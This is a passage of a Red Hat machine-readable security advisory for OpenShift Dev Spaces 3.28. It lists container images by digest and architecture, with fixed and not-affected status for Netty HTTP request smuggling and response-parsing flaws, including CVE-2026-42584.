"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "netty: io.netty/netty-codec-http: Netty: HTTP Request Smuggling due to improper handling of conflicting HTTP/1.0 headers"
},
{
"cve": "CVE-2026-42584",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"discovery_date": "2026-05-13T19:01:51.846351+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477224"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty, an asynchronous, event-driven network application framework. A remote attacker could exploit this vulnerability by sending a specific sequence of HTTP responses (103, followed by a 200 with a GET body, then another 200 for a HEAD request) when the client pipelines GET then HEAD requests. This can cause the HttpClientCodec to incorrectly pair responses, leading to subsequent HTTP responses being parsed from the wrong offset. This issue may result in information disclosure or other data integrity problems due to misinterpretation of network traffic.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty: io.netty/netty-codec-http: Netty: Incorrect HTTP response parsing leads to data confusion",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Important: A flaw in Netty\u0027s HttpClientCodec allows a remote attacker to cause data confusion. By sending a specially crafted sequence of HTTP responses, an attacker can cause subsequent HTTP responses to be parsed incorrectly, potentially leading to information disclosure or data integrity issues in applications utilizing Netty for HTTP client operations. This vulnerability affects various Red Hat products that bundle Netty, including Red Hat AMQ, Enterprise Application Platform, Red Hat Build of Quarkus, and Red Hat Build of Keycloak.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x"
],
"known_not_affected": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x",
